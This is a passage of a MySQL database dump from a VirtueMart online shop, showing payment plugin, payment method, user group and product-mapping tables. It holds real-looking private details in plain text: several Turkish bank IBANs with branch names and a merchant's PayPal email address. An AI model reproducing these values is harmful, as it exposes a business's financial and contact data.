) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb3 COMMENT='PayPal Table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_payment_plg_paypal`
--

LOCK TABLES `fz6t4_virtuemart_payment_plg_paypal` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_payment_plg_paypal` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_payment_plg_paypal` VALUES (1,4,'630406',3,'<span class=\"vmpayment_name\">PayPal</span>',56.69000,144,144,0.00,0.00,0,'58bbddc4e59189c3bea7bb48faec8b12','0',0.00,'0','0','0','0',0.00,'0','0','0',0.00,'0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','2014-08-08 07:07:48',677,'2014-08-08 07:07:48',677,'0000-00-00 00:00:00',0),(2,10,'241b012',3,'<span class=\"vmpayment_name\">PayPal</span>',56.69000,144,144,0.00,0.00,0,'58bbddc4e59189c3bea7bb48faec8b12','0',0.00,'0','0','0','0',0.00,'0','0','0',0.00,'0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','2014-08-08 07:13:15',677,'2014-08-08 07:13:15',677,'0000-00-00 00:00:00',0),(3,12,'b6cb014',3,'<span class=\"vmpayment_name\">PayPal</span>',204.71000,144,144,0.00,0.00,0,'58bbddc4e59189c3bea7bb48faec8b12','0',0.00,'0','0','0','0',0.00,'0','0','0',0.00,'0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','2014-08-08 07:16:25',677,'2014-08-08 07:16:25',677,'0000-00-00 00:00:00',0),(4,13,'06df015',3,'<span class=\"vmpayment_name\">PayPal</span>',204.71000,144,144,0.00,0.00,0,'58bbddc4e59189c3bea7bb48faec8b12','0',0.00,'0','0','0','0',0.00,'0','0','0',0.00,'0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','2014-08-08 07:16:57',677,'2014-08-08 07:16:57',677,'0000-00-00 00:00:00',0),(5,15,'AUQ3017',3,'<span class=\"vmpayment_name\">PayPal</span>',0.00000,144,144,0.00,0.00,0,'etgtvo7e9c67rhl80oegc1sc21','0',0.00,'0','0','0','0',0.00,'0','0','0',0.00,'0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','0','2020-02-13 11:02:04',0,'2020-02-13 11:02:04',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_payment_plg_paypal` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_payment_plg_standard`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_payment_plg_standard`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_payment_plg_standard` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_order_id` int unsigned DEFAULT NULL,
  `order_number` char(64) DEFAULT NULL,
  `virtuemart_paymentmethod_id` mediumint unsigned DEFAULT NULL,
  `payment_name` varchar(5000) DEFAULT NULL,
  `payment_order_total` decimal(15,5) NOT NULL DEFAULT '0.00000',
  `payment_currency` char(3) DEFAULT NULL,
  `email_currency` char(3) DEFAULT NULL,
  `cost_per_transaction` decimal(10,2) DEFAULT NULL,
  `cost_min_transaction` decimal(10,2) DEFAULT NULL,
  `cost_percent_total` decimal(10,2) DEFAULT NULL,
  `tax_id` smallint DEFAULT NULL,
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb3 COMMENT='Payment Standard Table';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_payment_plg_standard`
--

LOCK TABLES `fz6t4_virtuemart_payment_plg_standard` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_payment_plg_standard` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_payment_plg_standard` VALUES (1,2,'d29404',2,'<span class=\"vmpayment_name\">Banka Havalesi</span><br />',396.83000,'USD','144',0.00,NULL,0.00,-1,'2014-08-07 08:17:57',677,'2014-08-07 08:17:57',677,'0000-00-00 00:00:00',0),(2,3,'706405',2,'<span class=\"vmpayment_name\">Banka Havalesi</span><br />TL HESAPLARI:\r\nYapı Kredi Bankası - Topkapı (538) - IBAN: TR21 0006 7010 0000 0026 8596 02\r\nVakıfbank - Davutpaşa (453) - IBAN: TR33 0001 5001 5800 7294 5461 09\r\n\r\nUSD HESAPLARI:\r\nYapı Kredi Bankası - Topkapı (538) - IBAN: TR02 0006 7010 0000 0026 8596 53\r\nVakıfbank - Davutpaşa (453) - IBAN: TR24 0001 5001 5804 8011 2653 01\r\n\r\nEURO HESAPLARI:\r\nYapı Kredi Bankası - Topkapı (538) - IBAN: TR24 0006 7010 0000 0026 8596 45\r\nVakıfbank - Davutpaşa (453) - IBAN: TR42 0001 5001 5804 8011 2652 68',573.19000,'USD','144',0.00,NULL,0.00,-1,'2014-08-07 08:41:55',677,'2014-08-07 08:41:55',677,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_payment_plg_standard` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_paymentmethod_shoppergroups`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_paymentmethod_shoppergroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_paymentmethod_shoppergroups` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_paymentmethod_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` int unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_paymentmethod_id` (`virtuemart_paymentmethod_id`,`virtuemart_shoppergroup_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COMMENT='xref table for paymentmethods to shoppergroup';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_paymentmethod_shoppergroups`
--

LOCK TABLES `fz6t4_virtuemart_paymentmethod_shoppergroups` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_paymentmethod_shoppergroups` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_paymentmethod_shoppergroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_paymentmethods`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_paymentmethods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_paymentmethods` (
  `virtuemart_paymentmethod_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` int unsigned NOT NULL DEFAULT '1',
  `payment_jplugin_id` int NOT NULL DEFAULT '0',
  `payment_element` varchar(50) NOT NULL DEFAULT '',
  `payment_params` text,
  `currency_id` int unsigned DEFAULT NULL,
  `shared` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'valide for all vendors?',
  `ordering` int NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_paymentmethod_id`),
  KEY `payment_jplugin_id` (`payment_jplugin_id`),
  KEY `ordering` (`ordering`),
  KEY `virtuemart_vendor_id` (`virtuemart_vendor_id`),
  KEY `payment_element` (`payment_element`,`virtuemart_vendor_id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb3 COMMENT='The payment methods of your store';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_paymentmethods`
--

LOCK TABLES `fz6t4_virtuemart_paymentmethods` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_paymentmethods` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_paymentmethods` VALUES (2,1,10002,'standard','payment_logos=\"\"|countries=\"\"|payment_currency=\"0\"|email_currency=\"vendor\"|status_pending=\"U\"|send_invoice_on_order_null=\"1\"|min_amount=\"\"|max_amount=\"\"|cost_per_transaction=\"\"|cost_percent_total=\"\"|tax_id=\"-1\"|payment_info=\"TL HESAPLARI:\\r\\nYap\\u0131 Kredi Bankas\\u0131 - Topkap\\u0131 (538) - IBAN: TR21 0006 7010 0000 0026 8596 02\\r\\n\\/ Vak\\u0131fbank - Davutpa\\u015fa (453) - IBAN: TR33 0001 5001 5800 7294 5461 09\\r\\n*******************\\r\\nUSD HESAPLARI:\\r\\nYap\\u0131 Kredi Bankas\\u0131 - Topkap\\u0131 (538) - IBAN: TR02 0006 7010 0000 0026 8596 53\\r\\n\\/ Vak\\u0131fbank - Davutpa\\u015fa (453) - IBAN: TR24 0001 5001 5804 8011 2653 01\\r\\n*******************\\r\\nEURO HESAPLARI:\\r\\nYap\\u0131 Kredi Bankas\\u0131 - Topkap\\u0131 (538) - IBAN: TR24 0006 7010 0000 0026 8596 45\\r\\n\\/ Vak\\u0131fbank - Davutpa\\u015fa (453) - IBAN: TR42 0001 5001 5804 8011 2652 68\"|',NULL,0,0,1,'2014-08-07 06:49:35',676,'2014-08-07 08:43:55',676,'0000-00-00 00:00:00',0),(3,1,10006,'paypal','paypal_merchant_email=\"omurbozma@gmail.com\"|accelerated_onboarding=\"0\"|api_login_id=\"\"|api_password=\"\"|authentication=\"signature\"|api_signature=\"\"|api_certificate=\"\"|sandbox=\"0\"|sandbox_merchant_email=\"\"|sandbox_api_login_id=\"\"|sandbox_api_password=\"\"|sandbox_api_signature=\"\"|sandbox_api_certificate=\"\"|sandbox_payflow_vendor=\"\"|sandbox_payflow_partner=\"PayPal\"|payflow_vendor=\"\"|payflow_partner=\"\"|creditcards=\"\"|cvv_required=\"1\"|cvv_images=\"\"|paypalproduct=\"std\"|paypal_verified_only=\"\"|payment_currency=\"0\"|email_currency=\"vendor\"|log_ipn=\"\"|payment_logos=\"\"|debug=\"0\"|log=\"0\"|status_pending=\"U\"|status_success=\"C\"|status_canceled=\"X\"|status_expired=\"\"|status_capture=\"S\"|status_refunded=\"R\"|status_partial_refunded=\"R\"|expected_maxamount=\"\"|secure_post=\"\"|ipn_test=\"\"|no_shipping=\"0\"|address_override=\"0\"|payment_type=\"_xclick\"|subcription_trials=\"0\"|trial1_price=\"0\"|trial1_duration=\"1-M\"|subscription_duration=\"1-M\"|subscription_term=\"1\"|payment_plan_duration=\"1-M\"|payment_plan_term=\"2\"|payment_plan_defer=\"0\"|payment_plan_defer_duration=\"1-M\"|payment_plan_defer_strtotime=\"+1 Month\"|billing_max_amount_type=\"cart\"|billing_max_amount=\"\"|sftp_login=\"\"|sftp_password=\"\"|sftp_host=\"\"|sftp_sandbox_login=\"\"|sftp_sandbox_password=\"\"|countries=\"\"|min_amount=\"\"|max_amount=\"\"|publishup=\"\"|publishdown=\"\"|cost_per_transaction=\"\"|cost_percent_total=\"\"|tax_id=\"0\"|headerBgColor=\"\"|headerHeight=\"\"|logoFont=\"\"|logoFontColor=\"\"|logoFontSize=\"\"|bodyBgImg=[\"\"]|bodyBgColor=\"\"|PageTitleTextColor=\"\"|PageCollapseBgColor=\"\"|PageCollapseTextColor=\"\"|orderSummaryBgColor=\"\"|orderSummaryBgImage=[\"\"]|footerTextColor=\"\"|footerTextlinkColor=\"\"|pageButtonBgColor=\"\"|pageButtonTextColor=\"\"|pageTitleTextColor=\"\"|sectionBorder=\"\"|bordercolor=\"\"|headerimg=\"-1\"|logoimg=\"\"|payment_action=\"Sale\"|template=\"templateA\"|',NULL,0,0,1,'2014-08-07 06:50:11',676,'2014-08-07 08:19:25',676,'0000-00-00 00:00:00',0),(4,1,10018,'authorizenet','hostname=\"https:\\/\\/secure.authorize.net\\/gateway\\/transact.dll\"|login_id=\"\"|transaction_key=\"\"|secure_post=\"0\"|sandbox=\"0\"|sandbox_hostname=\"https:\\/\\/test.authorize.net\\/gateway\\/transact.dll\"|sandbox_login_id=\"\"|sandbox_transaction_key=\"\"|xtype=\"AUTH_CAPTURE\"|creditcards=\"\"|payment_approved_status=\"C\"|payment_declined_status=\"X\"|payment_held_status=\"P\"|payment_logos=\"\"|cvv_images=\"\"|countries=\"\"|min_amount=\"\"|max_amount=\"\"|cost_per_transaction=\"\"|cost_percent_total=\"\"|tax_id=\"-1\"|debug=\"0\"|log=\"0\"|',NULL,0,0,0,'2014-08-07 09:20:26',676,'2014-08-07 09:39:15',676,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_paymentmethods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_paymentmethods_en_gb`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_paymentmethods_en_gb`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_paymentmethods_en_gb` (
  `virtuemart_paymentmethod_id` int unsigned NOT NULL,
  `payment_name` varchar(180) NOT NULL DEFAULT '',
  `payment_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_paymentmethod_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_paymentmethods_en_gb`
--

LOCK TABLES `fz6t4_virtuemart_paymentmethods_en_gb` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_paymentmethods_en_gb` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_paymentmethods_en_gb` VALUES (2,'Bank Transfer','','banka-havalesi'),(3,'PayPal','','paypal');
/*!40000 ALTER TABLE `fz6t4_virtuemart_paymentmethods_en_gb` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_paymentmethods_tr_tr`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_paymentmethods_tr_tr`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_paymentmethods_tr_tr` (
  `virtuemart_paymentmethod_id` int unsigned NOT NULL,
  `payment_name` varchar(180) NOT NULL DEFAULT '',
  `payment_desc` varchar(19000) NOT NULL DEFAULT '',
  `slug` varchar(192) NOT NULL DEFAULT '',
  PRIMARY KEY (`virtuemart_paymentmethod_id`),
  UNIQUE KEY `slug` (`slug`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_paymentmethods_tr_tr`
--

LOCK TABLES `fz6t4_virtuemart_paymentmethods_tr_tr` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_paymentmethods_tr_tr` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_paymentmethods_tr_tr` VALUES (2,'Banka Havalesi','','banka-havalesi'),(3,'PayPal','','paypal'),(4,'Deneme','','deneme');
/*!40000 ALTER TABLE `fz6t4_virtuemart_paymentmethods_tr_tr` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_permgroups`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_permgroups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_permgroups` (
  `virtuemart_permgroup_id` tinyint unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_vendor_id` smallint unsigned NOT NULL DEFAULT '1',
  `group_name` char(128) DEFAULT NULL,
  `group_level` int DEFAULT NULL,
  `ordering` int NOT NULL DEFAULT '0',
  `shared` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_permgroup_id`),
  KEY `i_virtuemart_vendor_id` (`virtuemart_vendor_id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb3 COMMENT='Holds all the user groups';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_permgroups`
--

LOCK TABLES `fz6t4_virtuemart_permgroups` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_permgroups` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_permgroups` VALUES (1,1,'admin',0,0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(2,1,'storeadmin',250,0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(3,1,'shopper',500,0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0),(4,1,'demo',750,0,0,1,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `fz6t4_virtuemart_permgroups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_product_categories`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_product_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_product_categories` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_category_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_category_id`),
  KEY `ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=68 DEFAULT CHARSET=utf8mb3 COMMENT='Maps Products to Categories';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_product_categories`
--

LOCK TABLES `fz6t4_virtuemart_product_categories` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_categories` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_product_categories` VALUES (1,2,2,155),(2,3,3,10),(3,4,4,150),(4,5,7,1),(5,6,7,2),(6,7,7,0),(7,8,2,75),(8,9,2,205),(9,10,3,55),(10,11,5,270),(11,12,5,250),(12,13,6,160),(13,14,6,60),(14,15,8,255),(15,16,8,190),(16,17,13,165),(17,18,13,200),(18,19,13,245),(19,20,13,265),(20,21,13,285),(21,22,13,95),(22,23,10,100),(23,24,9,170),(24,25,9,110),(25,26,15,180),(26,27,15,115),(27,28,14,175),(28,29,14,280),(29,30,14,225),(30,31,17,65),(31,32,17,275),(32,33,17,235),(33,34,17,230),(34,35,17,125),(35,36,16,120),(40,40,4,220),(37,38,16,70),(39,39,4,215),(41,41,5,90),(42,42,5,130),(43,43,5,210),(44,44,8,135),(45,45,8,105),(46,46,10,140),(47,47,10,185),(48,48,14,240),(49,49,14,260),(50,50,14,85),(51,51,18,50),(52,52,18,45),(58,53,19,40),(56,55,20,35),(59,56,5,25),(63,60,4,30),(64,61,4,20),(67,66,7,3),(66,63,4,15);
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_product_customfields`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_product_customfields`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_product_customfields` (
  `virtuemart_customfield_id` int unsigned NOT NULL AUTO_INCREMENT COMMENT 'FIELD ID',
  `virtuemart_product_id` int NOT NULL DEFAULT '0',
  `virtuemart_custom_id` int NOT NULL DEFAULT '1' COMMENT 'CUSTOM GROUP ID',
  `customfield_value` varchar(2500) DEFAULT NULL COMMENT 'field value',
  `customfield_price` decimal(15,6) DEFAULT NULL COMMENT 'price',
  `disabler` int unsigned NOT NULL DEFAULT '0',
  `override` int unsigned NOT NULL DEFAULT '0',
  `noninheritable` int unsigned NOT NULL DEFAULT '0',
  `customfield_params` text COMMENT 'PARAM FOR PLUGINS',
  `product_sku` varchar(64) DEFAULT NULL,
  `product_gtin` varchar(64) DEFAULT NULL,
  `product_mpn` varchar(64) DEFAULT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int unsigned NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int unsigned NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_customfield_id`),
  UNIQUE KEY `unique_custf_prd_value` (`virtuemart_customfield_id`,`virtuemart_product_id`,`virtuemart_custom_id`,`customfield_value`(50)),
  KEY `virtuemart_custom_id` (`virtuemart_custom_id`),
  KEY `published` (`published`),
  KEY `ordering` (`ordering`),
  KEY `virtuemart_product_id` (`virtuemart_product_id`,`ordering`),
  KEY `unique_cust_prd_value` (`virtuemart_custom_id`,`virtuemart_product_id`,`customfield_value`(50)),
  KEY `customfield_value` (`customfield_value`(50))
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb3 COMMENT='custom fields';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_product_customfields`
--

LOCK TABLES `fz6t4_virtuemart_product_customfields` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_customfields` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_customfields` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_product_manufacturers`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_product_manufacturers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_product_manufacturers` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int DEFAULT NULL,
  `virtuemart_manufacturer_id` int unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_manufacturer_id`)
) ENGINE=MyISAM AUTO_INCREMENT=64 DEFAULT CHARSET=utf8mb3 COMMENT='Maps a product to a manufacturer';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_product_manufacturers`
--

LOCK TABLES `fz6t4_virtuemart_product_manufacturers` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_manufacturers` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_product_manufacturers` VALUES (1,3,2),(9,2,4),(3,4,1),(4,6,1),(5,5,1),(6,7,1),(7,8,4),(8,9,4),(10,10,1),(11,11,1),(12,12,6),(13,13,6),(14,14,4),(15,15,6),(16,17,1),(17,18,1),(18,19,1),(19,20,1),(20,21,1),(21,22,1),(22,23,7),(23,24,4),(24,25,4),(25,26,3),(26,27,3),(27,28,3),(28,29,3),(29,30,3),(30,31,3),(31,32,3),(32,33,3),(33,34,3),(34,35,3),(35,36,3),(38,39,2),(37,38,3),(39,40,1),(40,41,4),(41,42,4),(42,43,4),(43,44,4),(44,45,4),(45,46,7),(46,47,7),(47,48,3),(48,49,3),(49,50,3),(50,51,8),(51,52,8),(52,53,1),(54,55,1),(55,56,1),(59,60,1),(60,61,1),(63,66,1),(62,63,1);
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_manufacturers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_product_medias`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_product_medias`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_product_medias` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_media_id` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `virtuemart_product_id` (`virtuemart_product_id`,`virtuemart_media_id`),
  KEY `virtuemart_media_id` (`virtuemart_media_id`),
  KEY `ordering` (`virtuemart_product_id`,`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=116 DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_virtuemart_product_medias`
--

LOCK TABLES `fz6t4_virtuemart_product_medias` WRITE;
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_medias` DISABLE KEYS */;
INSERT INTO `fz6t4_virtuemart_product_medias` VALUES (8,3,33,1),(9,4,42,1),(3,2,6,1),(10,5,56,1),(11,6,57,1),(12,7,58,1),(13,8,59,1),(14,9,60,1),(89,53,119,1),(16,11,62,1),(17,12,63,1),(18,13,64,1),(19,14,65,1),(20,15,66,1),(21,16,67,1),(22,17,68,1),(23,18,69,1),(24,19,70,1),(25,20,71,1),(26,21,71,1),(27,22,72,1),(28,23,73,1),(29,24,74,1),(30,25,74,1),(31,27,79,1),(32,26,80,1),(33,28,81,1),(34,29,81,1),(35,30,81,1),(36,31,82,1),(37,32,82,1),(38,33,82,1),(39,34,82,1),(40,35,82,1),(41,36,83,1),(48,41,86,1),(43,38,83,1),(45,39,84,1),(56,46,91,1),(50,42,87,1),(52,43,88,1),(54,45,89,1),(55,44,90,1),(57,47,92,1),(58,48,81,1),(59,49,81,1),(60,50,81,1),(61,51,95,1),(63,52,97,2),(64,52,98,4),(72,52,102,5),(66,52,100,1),(93,61,122,2),(96,63,124,1),(94,61,123,1),(97,55,125,1),(71,52,101,3),(73,51,103,2),(75,51,101,5),(76,51,102,4),(80,51,108,3),(90,40,120,1),(108,53,136,2),(86,10,116,1),(88,56,118,1),(101,10,129,2),(103,63,131,2),(104,61,132,3),(105,40,133,2),(106,56,134,2),(107,55,135,2),(109,6,137,2),(110,5,138,2),(115,66,141,2),(113,66,139,1);
/*!40000 ALTER TABLE `fz6t4_virtuemart_product_medias` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_virtuemart_product_prices`
--

DROP TABLE IF EXISTS `fz6t4_virtuemart_product_prices`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_virtuemart_product_prices` (
  `virtuemart_product_price_id` int unsigned NOT NULL AUTO_INCREMENT,
  `virtuemart_product_id` int unsigned NOT NULL DEFAULT '0',
  `virtuemart_shoppergroup_id` int unsigned NOT NULL DEFAULT '0',
  `product_price` decimal(15,6) DEFAULT NULL,
  `override` tinyint(1) DEFAULT NULL,
  `product_override_price` decimal(15,5) DEFAULT NULL,
  `product_tax_id` int DEFAULT NULL,
  `product_discount_id` int DEFAULT NULL,
  `product_currency` smallint DEFAULT NULL,
  `product_price_publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `product_price_publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `price_quantity_start` int unsigned NOT NULL DEFAULT '0',
  `price_quantity_end` int unsigned NOT NULL DEFAULT '0',
  `created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int NOT NULL DEFAULT '0',
  `modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int NOT NULL DEFAULT '0',
  `locked_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `locked_by` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`virtuemart_product_price_id`),
  KEY `virtuemart_shoppergroup_id` (`virtuemart_shoppergroup_id`),
  KEY `product_price_publish_up` (`product_price_publish_up`),
  KEY `product_price_publish_down` (`product_price_publish_down`),
  KEY `price_quantity_start` (`price_quantity_start`),
  KEY `price_quantity_end` (`price_quantity_end`),
  KEY `virtuemart_product_id` (`virtuemart_product_id`),
  KEY `product_price` (`product_price`)
) ENGINE=MyISAM AUTO_INCREMENT=21 DEFAULT CHARSET=utf8mb3 COMMENT='Holds price records for a product';
/*!40101 SET character_set_client = @saved_cs_client */;

--
